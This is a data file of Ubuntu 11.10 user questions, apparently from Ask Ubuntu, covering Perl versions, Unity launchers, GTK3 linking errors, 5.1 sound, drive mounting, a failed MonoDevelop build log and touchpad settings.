91494	what version of perl is shipped with the desktop version of 11.10 ?	kindly let me know if perl version 5.12.4 is included in the desktop version of ubuntu 11.10 or does it have to be seperately downloaded ? i have been to packages.ubuntu.com and found that perl version 5.12.4 is available on ubuntu , but is that the server version or desktop version ? or does it mean that the package is available , but i have to download it seperately ? kindly let me know . i will be using ubuntu mainly as my personal desktop system as well as doing some scripting on perl and python .
91498	adding a custom launcher to the unity launcher	so i created a custom launcher using alacarte . now how do i add it to the launch bar ? the code is just language= '' ja '' google-chrome i can keep the icon in the launch bar by right-clicking and checking 'keep in launcher ' while japanese chrome is running . but this icon opens chrome in english ( the system language ) . edit : not a duplicate . launcher was n't coded by hand , there 's no .desktop to drag into the launch bar .
91501	are there any keyboard shortcuts to shutdown ?	are there any keyboard shortcuts to shutdown ? ( e.g . in windows alt+f4+alt+f4 right arrow enter )
91504	how do i delete an unwanted icon in the bar at the bottom of the screen , in gnome classic ?	ubuntu 11.10 gnome classic left-clicking on the icon launches a url middle-clicking on the icon ( with the mouse wheel ) does n't do anything . right-clicking on an icon displays two options : launch properties clicking on `` launch '' does the same as left-clicking on the icon . clicking on `` properties '' displays three fields : name location comment all three fields contain the same url left-clicking , middle-clicking or right-clicking anywhere in an unused part of the bar at the bottom of the screen . how do i delete the unwanted icon ?
91505	problem with compiling gtk3 program	i recently decided to learn gtk+ , so i installed the gtk3 developement package which contains all the necessary libraries , then i just wrote a simple program test which is supposed to display a gtk window simply and compiles it with the command below : gcc `pkg-config -- cflags -- libs gtk+-3.0` main.c -o test and the problem is at link time where i 'm getting undefined reference to all the functions call : ( /tmp/ccvqoycz.o : in function `main ' : main.c : ( .text+0x1f ) : undefined reference to `gtk_init' main.c : ( .text+0x29 ) : undefined reference to `gtk_window_new' main.c : ( .text+0x43 ) : undefined reference to `g_type_check_instance_cast' main.c : ( .text+0x64 ) : undefined reference to `g_signal_connect_data' main.c : ( .text+0x70 ) : undefined reference to `gtk_widget_show' main.c : ( .text+0x75 ) : undefined reference to `gtk_main' /tmp/ccvqoycz.o : in function `ondestroy ' : main.c : ( .text+0x96 ) : undefined reference to `gtk_main_quit' collect2 : ld returned 1 exit status voilă , if anyone has a solution ...
91506	2 channel sound when 5.1 is expected	i have this sound issue ever since ubuntu 10.x . i am on 11.10 now and i was hoping this would have been fixed . i would like to use 5.1 speaker sound , so i go to the speaker icon in the top right of the screen and select sound properties , navigate to hardware tab and select 5.1 analog mode . this works wile sound is playing e.g . from banshee music player . but each time i change a song , the sound is back to 2 channels again . i have tried the answer from `` sound reverts to 2 channels from 5.1 + analog '' , but unfortunately it did not work for me . i am on 64 bit ubuntu 11.10 . sound settings : profile = analog surround 5.1 output . i use a acer aspire 8930 laptop ( and yes it is ridiculous but it really has a 5.1 speaker system build in ) . somehow banshee does not remember the 5.1 hardware setting . each time i change a song manually , it will switch to 2 speaker only , resulting in rather crappy sound . it seems that overall the sound in my system does use 5.1 speakers . does anyone have any ideas ?
91511	how can i speed up boot time ?	here is my bootchart ( warning ! huge image ! ) here is my kernel log here is my syslog here is my dmesg
91512	gnome-tweak-tool does n't start	i have a very strange problem . i have installed ubuntu again and i have of course installed gnome-shell and gnome-tweak-tool . the tweak-tool does n't start when i click on the icon . it loads a few seconds , but then it 's disappeared . can anyone tell me what i 'm doing wrong ? if i run gnome-tweak-tool in the terminal i get this error : warning : schema /usr/share/glib-2.0/schemas/org.gnome.shell.gschema.xml missing summary text : < key name= '' saved-im-presence '' type= '' i '' > < default > 1 < /default > < summary/ > < /key > warning : schema /usr/share/glib-2.0/schemas/org.gnome.shell.gschema.xml missing summary text : < key name= '' saved-session-presence '' type= '' i '' > < default > 0 < /default > < summary/ > < /key > glib-gio-error ** : settings schema 'org.gnome.shell.extensions.user-theme ' is not installed
91516	samsung n150+ touchpad settings disappeared	edge scrolling was n't working on my samsung 150+ netbook so i enabled it using the fix described here : ca n't edge scroll on samsung rv510 since doing this the touchpad options in system settings have ceased to appear . i really would like to to disable the touchpad whilst typing but can no longer see the option to enable this . is it possible to disable the touchpad whilst typing and have edge scrolling at the same time ?
91517	ca n't update software with update manager due to telepathy-butterfly	when i try to update my ubuntu 11.10 i get this message after downloading everything `` the installation or removal of a software package failed . installarchives ( ) failed : ( reading database ... dpkg : unrecoverable fatal error , aborting : files list file for package 'telepathy-butterfly ' is missing final newline error in function : ``
91519	download permission denied while using wubi	i am trying to download ubuntu with the windows installer . i had no problems last week . but this week after the download and extraction of files is complete i get a permission denied error message . can anybody help ?
91520	my lacie 500 gb not mounted on 11.10	my external usb drive was recognized with 10.x versions of ubuntu but since 11.x i am getting stuck , i had tried everything i read in forums but still the same error : 4956.401052 ] usb 2-1.4 : new high speed usb device number 14 using ehci_hcd [ 4956.539216 ] scsi14 : uas [ 4956.740955 ] scsi 14:0:0:0 : direct-access lacie rugged fw usb3 1081 pq : 0 ansi : 4 [ 4963.256055 ] scsi 14:0:0:0 : uas_eh_abort_handler tag 0 [ 4963.256076 ] scsi 14:0:0:0 : uas_eh_device_reset_handler tag 0 [ 4963.256085 ] scsi 14:0:0:0 : uas_eh_target_reset_handler tag 0 [ 4963.256091 ] scsi 14:0:0:0 : uas_eh_bus_reset_handler tag 0 [ 4963.328122 ] usb 2-1.4 : reset high speed usb device number 14 using ehci_hcd [ 4963.468743 ] scsi 14:0:0:0 : device offlined - not ready after error recovery [ 4963.468813 ] scsi 14:0:0:0 : rejecting i/o to offline device [ 4963.468831 ] scsi 14:0:0:0 : rejecting i/o to offline device [ 4963.469204 ] scsi 14:0:0:1 : uas_sense_old : urb length 26 disagrees with iu sense data length 510 , using 18 bytes of sense data [ 4963.512104 ] sd 14:0:0:0 : attached scsi generic sg3 type 0 [ 4994.253779 ] sd 14:0:0:0 : uas_eh_abort_handler tag 0 [ 4994.253802 ] sd 14:0:0:0 : uas_eh_device_reset_handler tag 0 [ 4994.253809 ] sd 14:0:0:0 : uas_eh_target_reset_handler tag 0 [ 4994.253815 ] sd 14:0:0:0 : uas_eh_bus_reset_handler tag 0 [ 4994.325880 ] usb 2-1.4 : reset high speed usb device number 14 using ehci_hcd [ 4994.466488 ] sd 14:0:0:0 : device offlined - not ready after error recovery [ 4994.466555 ] sd 14:0:0:0 : rejecting i/o to offline device [ 4994.466573 ] sd 14:0:0:0 : rejecting i/o to offline device [ 4994.466582 ] sd 14:0:0:0 : rejecting i/o to offline device [ 4994.466588 ] sd 14:0:0:0 : [ sdc ] read capacity failed [ 4994.466593 ] sd 14:0:0:0 : [ sdc ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 4994.466600 ] sd 14:0:0:0 : [ sdc ] sense not available . [ 4994.466608 ] sd 14:0:0:0 : rejecting i/o to offline device [ 4994.466616 ] sd 14:0:0:0 : [ sdc ] write protect is off [ 4994.466622 ] sd 14:0:0:0 : [ sdc ] mode sense : 00 00 00 00 [ 4994.466629 ] sd 14:0:0:0 : rejecting i/o to offline device [ 4994.466635 ] sd 14:0:0:0 : [ sdc ] asking for cache data failed [ 4994.466640 ] sd 14:0:0:0 : [ sdc ] assuming drive cache : write through [ 4994.467003 ] sd 14:0:0:0 : [ sdc ] attached scsi disk if i am trying on an old ubuntu , the drive is mounted ,
91525	how to run normal session from user script after passing init=my_script in grub entry	i have entry in grub to start my configuration script written in python . i would like to give user option to start normal session after the work is done . but i 've found that /sbin/init needs to have pid==1 , so when i run in python : # ! /usr/bin/python ... import subprocess subprocess.call ( [ `` /bin/bash '' , `` -c '' , `` exec /sbin/init 2 '' ] ) # subprocess.call ( `` exec /sbin/init 2 '' , shell=true ) -it ends with : init : failed to connect to socket /com/ubuntu/upstart : connection refused and kernel panic is there any solution for this ?
91527	problem installing monodevelop 2.10.5 on ubuntu 11.10	these are the steps i 'm doing > git clone git : //github.com/mono/monodevelop.git cloning into monodevelop ... remote : counting objects : 252453 , done . remote : compressing objects : 100 % ( 47535/47535 ) , done . remote : total 252453 ( delta 204992 ) , reused 250817 ( delta 203552 ) receiving objects : 100 % ( 252453/252453 ) , 109.36 mib | 226 kib/s , done . resolving deltas : 100 % ( 204992/204992 ) , done . then i do , ( is this step correct ? ) > sudo apt-get build-dep monodevelop [ sudo ] password for tarun : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i then do > cd monodevelop > ./configure the build profile 'default ' does not exist . a new profile will be created . select the packages to include in the build for the profile 'default ' : 1 . [ x ] main 2 . [ ] extras/javabinding 3 . [ ] extras/valabinding 4 . [ ] extras/monodevelop.database 5 . [ ] extras/monodevelop.debugger.gdb 6 . [ ] extras/pybinding 7 . [ ] extras/monodevelop.monomac 8 . [ ] extras/monodevelop.meego enter the number of an add-in to enable/disable , ( q ) quit , ( c ) clear all , ( s ) select all , or enter to continue : s select the packages to include in the build for the profile 'default ' : 1 . [ x ] main 2 . [ x ] extras/javabinding 3 . [ x ] extras/valabinding 4 . [ x ] extras/monodevelop.database 5 . [ x ] extras/monodevelop.debugger.gdb 6 . [ x ] extras/pybinding 7 . [ x ] extras/monodevelop.monomac 8 . [ x ] extras/monodevelop.meego enter the number of an add-in to enable/disable , ( q ) quit , ( c ) clear all , ( s ) select all , or enter to continue : configuring package : main -- -- -- -- -- -- -- -- -- -- -- -- - configuration options : running aclocal ... running automake -- foreign ... configure.in:3 : installing `./install-sh' configure.in:3 : installing `./missing' running autoconf ... running ./configure -- enable-maintainer-mode -- enable-compile-warnings -- prefix=/usr/local ... configure : warning : unrecognized options : -- enable-compile-warnings checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking for mono ... /usr/bin/mono checking for gmcs ... /usr/bin/gmcs checking for update-mime-database ... /usr/bin/update-mime-database checking for pkg-config ... /usr/bin/pkg-config checking for msgfmt ... /usr/bin/msgfmt checking for msgmerge ... /usr/bin/msgmerge checking pkg-config is at least version 0.9.0 ... yes checking for unmanaged_dependencies_mono ... yes checking for mono ... /usr/bin/mono checking for dmcs ... /usr/bin/dmcs checking for mono_addins ... yes checking for mono_addins_setup ... yes checking for mono_addins_gui ... yes checking for glib_sharp ... yes checking for gtk_sharp ... yes checking for glade_sharp ... yes checking for monodoc ... yes checking for gnome_sharp ... yes checking for gnome_vfs_sharp ... yes checking for gconf_sharp ... yes configure : creating ./config.status config.status : creating build/makefile config.status : creating build/macosx/makefile config.status : creating contrib/makefile config.status : creating contrib/mono.cecil/makefile config.status : creating contrib/mono.debugger.soft/makefile config.status : creating contrib/nrefactory/makefile config.status : creating contrib/sharpen/makefile config.status : creating contrib/ngit/makefile config.status : creating contrib/nsch/makefile config.status : creating contrib/icsharpcode.nrefactory/makefile config.status : creating contrib/icsharpcode.decompiler/makefile config.status : creating src/makefile config.status : creating src/core/makefile config.status : creating src/core/mono.texteditor/makefile config.status : creating src/core/mono.debugging/makefile config.status : creating src/core/monodevelop.core/makefile config.status : creating src/core/monodevelop.projects.formats.msbuild/makefile config.status : creating src/core/monodevelop.ide/makefile config.status : creating src/core/monodevelop.ide/buildvariables.cs config.status : creating src/core/monodevelop.startup/makefile config.status : creating src/tools/makefile config.status : creating src/tools/maccrashlogger/makefile config.status : creating src/tools/mdcrashlog/makefile config.status : creating src/tools/mdhost/makefile config.status : creating src/tools/mdtool/makefile config.status : creating src/tools/sharpcoco/makefile config.status : creating src/tools/mdmonitor/makefile config.status : creating src/addins/makefile config.status : creating src/addins/monodeveloperextensions/makefile config.status : creating src/addins/monodeveloperextensions/nunit/makefile config.status : creating src/addins/nunit/makefile config.status : creating src/addins/nunit/nunitrunner/makefile config.status : creating src/addins/versioncontrol/monodevelop.versioncontrol/makefile config.status : creating src/addins/versioncontrol/monodevelop.versioncontrol.subversion/makefile config.status : creating src/addins/versioncontrol/monodevelop.versioncontrol.subversion.unix/makefile config.status : creating src/addins/versioncontrol/monodevelop.versioncontrol.git/makefile config.status : creating src/addins/versioncontrol/makefile config.status : creating src/addins/csharpbinding/makefile config.status : creating src/addins/csharpbinding/autotools/makefile config.status : creating src/addins/csharpbinding/aspnet/makefile config.status : creating src/addins/ilasmbinding/makefile config.status : creating src/addins/vbnetbinding/makefile config.status : creating src/addins/prj2make-sharp-lib/makefile config.status : creating src/addins/changelogaddin/makefile config.status : creating src/addins/monodevelop.gtkcore/makefile config.status : creating src/addins/monodevelop.gtkcore/libstetic/makefile config.status : creating src/addins/monodevelop.gtkcore/libsteticui/makefile config.status : creating src/addins/texttemplating/makefile config.status : creating src/addins/texttemplating/mono.texttemplating/makefile config.status : creating src/addins/texttemplating/texttransform/makefile config.status : creating src/addins/texttemplating/monodevelop.texttemplating/makefile config.status : creating src/addins/aspnet/makefile config.status : creating src/addins/aspnet/monodevelop.aspnet/makefile config.status : creating src/addins/aspnet/monodevelop.aspnet.mvc/makefile config.status : creating src/addins/monodevelop.autotools/makefile config.status : creating src/addins/monodevelop.designersupport/makefile config.status : creating src/addins/monodevelop.webreferences/makefile config.status : creating src/addins/deployment/makefile config.status : creating src/addins/deployment/monodevelop.deployment/makefile config.status : creating src/addins/deployment/monodevelop.deployment.linux/makefile config.status : creating src/addins/monodevelop.gettext/makefile config.status : creating src/addins/monodevelop.regextoolkit/makefile config.status : creating src/addins/cbinding/makefile config.status : creating src/addins/gnomeplatform/makefile config.status : creating src/addins/macplatform/makefile config.status : creating src/addins/windowsplatform/makefile config.status : creating src/addins/monodevelop.assemblybrowser/makefile config.status : creating src/addins/monodevelop.sourceeditor2/makefile config.status : creating src/addins/monodevelop.moonlight/makefile config.status : creating src/addins/monodevelop.xmleditor/makefile config.status : creating src/addins/monodevelop.codemetrics/makefile config.status : creating src/addins/monodevelop.refactoring/makefile config.status : creating src/addins/monodevelop.debugger/makefile config.status : creating src/addins/monodevelop.debugger.soft/makefile config.status : creating src/addins/monodevelop.debugger.soft/mono.debugging.soft/makefile config.status : creating src/addins/monodevelop.debugger.soft/monodevelop.debugger.soft/makefile config.status : creating src/addins/monodevelop.debugger.soft/monodevelop.debugger.soft.aspnet/makefile config.status : creating src/addins/monodevelop.debugger.soft/monodevelop.debugger.soft.moonlight/makefile config.status : creating src/addins/monodevelop.hexeditor/makefile config.status : creating src/addins/monodevelop.docfood/makefile config.status : creating src/addins/monodevelop.macdev/makefile config.status : creating tests/makefile config.status : creating tests/unittests/makefile config.status : creating makefile config.status : creating monodevelop config.status : creating mdtool config.status : creating monodevelop.pc config.status : creating monodevelop-core-addins.pc config.status : creating monodevelop-core-mac-addins.pc config.status : creating monodevelop.spec config.status : creating po/makefile config.status : creating man/makefile config.status : creating theme-icons/makefile configure : warning : unrecognized options : -- enable-compile-warnings configuration summary * installation prefix = /usr/local * c # compiler = /usr/bin/dmcs * mono class library development extensions : yes * version control providers : * subversion ( unix ) : yes * git : yes * platform bindings : gnome * unit tests : no now type `make ' to compile monodevelop configuring package : extras/javabinding -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - configuration options : looking for required packages checking for package 'mono-addins'.. found . checking for package 'gtk-sharp-2.0'.. found . checking for package 'glade-sharp-2.0'.. found . checking for package 'monodevelop'.. found . monodevelop-java has been configured with prefix = /usr/local config = debug configuring package : extras/valabinding -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - configuration options : running aclocal ... running automake -- gnu ... configure.in:3 : installing `./install-sh' configure.in:3 : installing `./missing' makefile.am : installing `./install' running autoconf ... running ./configure -- enable-maintainer-mode -- enable-compile-warnings -- prefix=/usr/local ... configure : warning : unrecognized options : -- enable-compile-warnings checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking for mono ... /usr/bin/mono checking for dmcs ... /usr/bin/dmcs checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for unmanaged_dependencies_mono ... yes checking for mono ... /usr/bin/mono checking for dmcs ... /usr/bin/dmcs checking for mono_addins ... yes checking for mono_addins_setup ... yes checking for mono_addins_gui ... yes checking for glib_sharp ... yes checking for gtk_sharp ... yes checking for glade_sharp ... yes checking for monodevelop ... yes checking for monodevelop_core_addins ... yes checking for gnome_sharp ... yes checking for gnome_vfs_sharp ... yes checking for gconf_sharp ... yes checking for libvala ... no configure : error : package requirements ( libvala-0.12 > = 0.12.0 ) were not met : no package 'libvala-0.12 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables libvala_cflags and libvala_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i 'm following this tutorial but , i have no clue what this means : > sudo make & & make run what am i supposed to do next ? update i installed libvala-0.12-dev , and re-ran ./configure , it worked well , i then did > sudo make & & make run monomacbuildextension.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacbuildextension.cs ( 41,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacexecutionhandler.cs ( 37,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 40,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 41,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 42,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 46,62 ) : error cs0246 : the type or namespace name `ixcodetrackedproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 46,84 ) : error cs0246 : the type or namespace name `inativereferencingproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 103,52 ) : error cs0118 : `monodevelop.monomac.monomacproject.ixcodetrackedproject.xcodeprojecttracker ' is a `property ' but a `type ' was expected monomaccommands.cs ( 34,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackagingtool.cs ( 32,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacprojectmigrationhandler.cs ( 37,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacbuildextension.cs ( 155,46 ) : error cs0246 : the type or namespace name `plistdictionary ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 155,80 ) : error cs0246 : the type or namespace name `plistobjectbase ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 219,44 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 231,36 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 289,43 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 53,96 ) : error cs0246 : the type or namespace name `applicationstartinfo ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 180,17 ) : error cs0246 : the type or namespace name `processserialnumber ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 184,40 ) : error cs0246 : the type or namespace name `processserialnumber ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 77,17 ) : error cs0118 : `monodevelop.monomac.monomacproject.ixcodetrackedproject.xcodeprojecttracker ' is a `property ' but a `type ' was expected monomacproject.cs ( 79,37 ) : error cs0246 : the type or namespace name `ixcodetrackedproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 105,44 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 113,53 ) : error cs0115 : `monodevelop.monomac.monomacproject.monomacxcodeprojecttracker.getframeworks ( ) ' is marked as an override but no suitable method found to override monomacproject.cs ( 118,44 ) : error cs0246 : the type or namespace name `xcodeproject ' could not be found . are you missing a using directive or an assembly reference ? gtk-gui/monodevelop.monomac.gui.monomacpackagingsettingswidget.cs ( 15,45 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gtk-gui/monodevelop.monomac.gui.monomacpackagingsettingswidget.cs ( 31,45 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 28,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 32,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 134,38 ) : error cs0246 : the type or namespace name `signingidentitycombo ' could not be found . are you missing a using directive or an assembly reference ? monomacpackaging.cs ( 30,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackaging.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackaging.cs ( 40,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? task `` csc '' execution -- failed done building target `` corecompile '' in project `` /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac/monodevelop.monomac.csproj '' . -- failed done building project `` /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac/monodevelop.monomac.csproj '' . -- failed task `` msbuild '' execution -- failed done building target `` build '' in project `` /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac.sln '' . -- failed done building project `` /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac.sln '' . -- failed build failed . warnings : /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac.sln ( default targets ) - > ( build target ) - > /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac/monodevelop.monomac.csproj ( default targets ) - > /usr/lib/mono/4.0/microsoft.common.targets ( resolveassemblyreferences target ) - > /usr/lib/mono/4.0/microsoft.common.targets : warning : reference 'monomac , version=0.0.0.0 , culture=neutral , publickeytoken=null ' not resolved /usr/lib/mono/4.0/microsoft.common.targets : warning : reference 'monodevelop.macdev , version=2.6.0.0 , culture=neutral , publickeytoken=null ' not resolved /usr/lib/mono/4.0/microsoft.common.targets : warning : reference 'macplatform , version=2.6.0.0 , culture=neutral , publickeytoken=null ' not resolved errors : /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac.sln ( default targets ) - > ( build target ) - > /home/tarun/monodevelop/extras/monodevelop.monomac/monodevelop.monomac/monodevelop.monomac.csproj ( default targets ) - > /usr/lib/mono/4.0/microsoft.csharp.targets ( corecompile target ) - > monomacbuildextension.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacbuildextension.cs ( 41,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacexecutionhandler.cs ( 37,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 40,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 41,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 42,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 46,62 ) : error cs0246 : the type or namespace name `ixcodetrackedproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 46,84 ) : error cs0246 : the type or namespace name `inativereferencingproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 103,52 ) : error cs0118 : `monodevelop.monomac.monomacproject.ixcodetrackedproject.xcodeprojecttracker ' is a `property ' but a `type ' was expected monomaccommands.cs ( 34,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackagingtool.cs ( 32,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacprojectmigrationhandler.cs ( 37,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacbuildextension.cs ( 155,46 ) : error cs0246 : the type or namespace name `plistdictionary ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 155,80 ) : error cs0246 : the type or namespace name `plistobjectbase ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 219,44 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 231,36 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacbuildextension.cs ( 289,43 ) : error cs0246 : the type or namespace name `filepair ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 53,96 ) : error cs0246 : the type or namespace name `applicationstartinfo ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 180,17 ) : error cs0246 : the type or namespace name `processserialnumber ' could not be found . are you missing a using directive or an assembly reference ? monomacexecutionhandler.cs ( 184,40 ) : error cs0246 : the type or namespace name `processserialnumber ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 77,17 ) : error cs0118 : `monodevelop.monomac.monomacproject.ixcodetrackedproject.xcodeprojecttracker ' is a `property ' but a `type ' was expected monomacproject.cs ( 79,37 ) : error cs0246 : the type or namespace name `ixcodetrackedproject ' could not be found . are you missing a using directive or an assembly reference ? monomacproject.cs ( 105,44 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacproject.cs ( 113,53 ) : error cs0115 : `monodevelop.monomac.monomacproject.monomacxcodeprojecttracker.getframeworks ( ) ' is marked as an override but no suitable method found to override monomacproject.cs ( 118,44 ) : error cs0246 : the type or namespace name `xcodeproject ' could not be found . are you missing a using directive or an assembly reference ? gtk-gui/monodevelop.monomac.gui.monomacpackagingsettingswidget.cs ( 15,45 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gtk-gui/monodevelop.monomac.gui.monomacpackagingsettingswidget.cs ( 31,45 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 28,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 32,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? gui/macpackagingsettingswidget.cs ( 134,38 ) : error cs0246 : the type or namespace name `signingidentitycombo ' could not be found . are you missing a using directive or an assembly reference ? monomacpackaging.cs ( 30,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackaging.cs ( 39,19 ) : error cs0234 : the type or namespace name `macdev ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? monomacpackaging.cs ( 40,19 ) : error cs0234 : the type or namespace name `macinterop ' does not exist in the namespace `monodevelop ' . are you missing an assembly reference ? 3 warning ( s ) 34 error ( s ) time elapsed 00:00:02.6804350 make [ 1 ] : *** [ all ] error 1 make [ 1 ] : leaving directory `/home/tarun/monodevelop/extras/monodevelop.monomac' what do i do about the errors ?
91533	playing video on intel gma with top-of-the-edge ( xorg-edgers ) drivers - known bugs ?	i have 'xorg-edgers ' repository enabled . two to three weeks ago after update , playing video through 'x-video ' had become impossible : x server freezes , entire screen starts to blink slowly , then i have to reboot . i 'm on intel gma video ( sandy bridge embedded video ) . does anybody experience similar problem ? is there bug reported on this ?
91534	disable touchpad while the lid is down	kubuntu 11.10 ( netbook edition ) my wife 's netbook has the following problem : when the lid is closed , it activates the touchpad every now and then - it makes small movements and taps . the notebook is set not to go to sleep while the ac adapter is plugged in , so whenever the lid closes , it keeps doing things on its own . especially annoying when pausing a film and going to sleep , as after a while it will tap on the player window and resume the film , scaring the crap out of everyone around . i did n't find any option to disable the touchpad while the lid is down , but maybe there 's some kind of an event i could hook into and disable/re-enable it manually ?
